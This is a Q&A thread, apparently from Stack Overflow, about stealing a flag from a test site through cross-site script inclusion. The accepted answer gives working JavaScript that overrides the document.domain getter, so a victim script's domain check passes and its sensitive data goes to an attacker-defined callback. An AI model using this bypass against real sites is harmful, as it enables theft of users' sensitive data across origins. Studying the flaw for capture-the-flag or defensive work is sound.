# How to bypass a document.domain check?

Tags: javascript, xss

I'm trying to execute an XSSI on a test site. In the vulnerable site vuln.com there is a page vuln.com/xssi that dynamically load a script from vuln.com/displaysensitivedata :

```
(function (sensitivedata) {
    if (document.domain === 'vuln.com') {
        displaysensitiveinfo(sensitivedata);
    }
})([['data1', 'FLAG{}']]);
```

My goal is to steal the flag creating an attacker page that the victim would visit.
Including the script also the sensitive data are included and in my attacker page, I made the displaysensitiveinfo(sensitivedata) method leak the data.

```
<script src="vuln.com/displaysensitivedata"></script>

function displaysensitiveinfo(sensitivedata){
    console.log(sensitivedata); 
}
```

But I can't pass the check of the document.domain .

How can I overwrite the document.domain to bypass the check?

Comment: does this function displaysensitiveinfo exists before its called? do you see errors in console?

Comment: In the original page where the javascript is being dynamically load it exist and add the sensitive data to the document of the page in order to display the sensitive information to the user.
In the attacker page i wrote a simple displaysensitiveinfo that log the data in the console.
No there is no error in the console.

Comment: `document.domain` is a deprecated feature and so it should not be used at all in new code. You can only set the domain to the same domain as the source page, or to a parent domain.

Answer (score 0, accepted):

The script at vuln.com/displaysensitivedata is an immediately invoked function expression (IIFE) so you need to make sure that your definition of the `displaysensitiveinfo` function is evaluated *before* that script is loaded.

Then you can force `document.domain` to return `vuln.com` by redefining its getter:

```js
// this script must be loaded BEFORE the script at vuln.com/displaysensitivedata
Object.defineProperty(document, 'domain', {get: () => "vuln.com"});

function displaysensitiveinfo(data) {
  alert(`gotcha ${data}`);
}

// vuln.com/displaysensitivedata

(function (sensitivedata) {
  if (document.domain === 'vuln.com') {
    displaysensitiveinfo(sensitivedata);
  }
})([['data1', 'FLAG{}']]);
```